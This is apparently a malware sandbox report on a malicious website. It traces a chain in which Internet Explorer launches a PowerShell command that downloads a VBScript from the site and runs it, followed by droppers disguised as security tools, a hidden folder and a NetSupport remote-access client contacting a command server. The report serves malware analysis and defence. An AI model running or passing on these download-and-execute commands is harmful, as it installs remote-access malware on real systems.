General Info

URL

https://radiobox-online.org

Full analysis
https://app.any.run/tasks/e24945bb-027e-4aee-a3b1-7ea12444439c
Verdict
Malicious activity
Analysis date
7/11/2019, 16:13:28
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

trojan

loader

unwanted

netsupport

Indicators:

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evasion option
on
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.34.7)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 67.0.4 (x86 en-US) (67.0.4)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB4019990
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

Application was dropped or rewritten from another process
  • KB24115436.exe (PID: 3692)
  • client32.exe (PID: 2268)
  • WinSupport.exe (PID: 4028)
  • temp69.exe (PID: 3896)
Loads dropped or rewritten executable
  • client32.exe (PID: 2268)
Connects to CnC server
  • client32.exe (PID: 2268)
Writes to a start menu file
  • WinSupport.exe (PID: 4028)
Downloads executable files from IP
  • WScript.exe (PID: 3620)
Downloads executable files from the Internet
  • WScript.exe (PID: 3620)
Connects to server without host name
  • client32.exe (PID: 2268)
Creates files in the user directory
  • WinSupport.exe (PID: 4028)
  • client32.exe (PID: 2268)
  • KB24115436.exe (PID: 3692)
  • powershell.exe (PID: 3872)
Reads Internet Cache Settings
  • client32.exe (PID: 2268)
Executable content was dropped or overwritten
  • WinSupport.exe (PID: 4028)
  • WScript.exe (PID: 3620)
  • KB24115436.exe (PID: 3692)
  • temp69.exe (PID: 3896)
Executes scripts
  • WScript.exe (PID: 2432)
  • powershell.exe (PID: 3872)
Executes PowerShell scripts
  • iexplore.exe (PID: 3076)
  • iexplore.exe (PID: 3556)
Application launched itself
  • WScript.exe (PID: 2432)
Uses ATTRIB.EXE to modify file attributes
  • temp69.exe (PID: 3896)
Drops NetSupport executable file
  • WinSupport.exe (PID: 4028)
Creates files in the user directory
  • iexplore.exe (PID: 3556)
Reads settings of System Certificates
  • iexplore.exe (PID: 3076)
  • iexplore.exe (PID: 3556)
Reads internet explorer settings
  • iexplore.exe (PID: 3556)
Changes settings of System certificates
  • iexplore.exe (PID: 3076)
Changes internet zones settings
  • iexplore.exe (PID: 3076)
Reads Internet Cache Settings
  • iexplore.exe (PID: 3556)
Adds / modifies Windows certificates
  • iexplore.exe (PID: 3076)

Processes

Total processes
46
Monitored processes
11
Malicious processes
8
Suspicious processes
0

Behavior graph

(graph not rendered in this export; nodes: iexplore.exe, iexplore.exe, powershell.exe (no specs), powershell.exe, wscript.exe, wscript.exe, temp69.exe, attrib.exe (no specs), kb24115436.exe, winsupport.exe, client32.exe; edge labels: start, download and start, drop and start, drop and start, drop and start, start)

Process information

PID
3076
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" https://radiobox-online.org
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\cryptbase.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wship6.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\ieui.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\url.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\msfeeds.dll
c:\windows\system32\sxs.dll
c:\windows\system32\mlang.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\userenv.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mssprxy.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\credssp.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe

PID
3556
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3076 CREDAT:71937
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\comdlg32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rsaenh.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\mlang.dll
c:\windows\system32\uxtheme.dll
c:\program files\java\jre1.8.0_92\bin\ssv.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\version.dll
c:\progra~1\micros~1\office14\urlredir.dll
c:\windows\system32\secur32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\progra~1\micros~1\office14\msohev.dll
c:\program files\java\jre1.8.0_92\bin\jp2ssv.dll
c:\program files\java\jre1.8.0_92\bin\msvcr100.dll
c:\program files\java\jre1.8.0_92\bin\deploy.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\sxs.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\credssp.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\p2pcollab.dll
c:\windows\system32\qagentrt.dll
c:\windows\system32\fveui.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\msls31.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\jscript.dll
c:\windows\system32\imgutil.dll
c:\windows\system32\pngfilt.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll

PID
3968
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('https://radiobox-online.org/images/image.vbs2','documentation.vbs');Start-Process 'documentation.vbs'
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll

PID
3872
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('https://radiobox-online.org/images/image.vbs2','documentation.vbs');Start-Process 'documentation.vbs'
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\security.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\wscript.exe
c:\windows\system32\netutils.dll

PID
2432
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\documentation.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\credssp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\mlang.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\nlaapi.dll
c:\program files\common files\system\ado\msado15.dll
c:\windows\system32\msdart.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll

PID
3620
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\temp.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\program files\common files\system\ado\msado15.dll
c:\windows\system32\msdart.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\users\admin\appdata\local\temp\temp69.exe

PID
3896
CMD
"C:\Users\admin\AppData\Local\Temp\temp69.exe"
Path
C:\Users\admin\AppData\Local\Temp\temp69.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Piriform Ltd
Description
CCleaner
Version
4, 11, 00, 4619
Modules
Image
c:\users\admin\appdata\local\temp\temp69.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\credssp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll
c:\temp\kb24115436.exe

PID
2660
CMD
attrib +h +s C:\Temp
Path
C:\Windows\system32\attrib.exe
Indicators
No indicators
Parent process
temp69.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Attribute Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\attrib.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ulib.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3692
CMD
"C:\Temp\KB24115436.exe"
Path
C:\Temp\KB24115436.exe
Indicators
Parent process
temp69.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Qihoo 360 Technology Co. Ltd.
Description
360 Total Security
Version
10,0,0,1160
Modules
Image
c:\temp\kb24115436.exe
c:\systemroot\system32\ntdll.dll
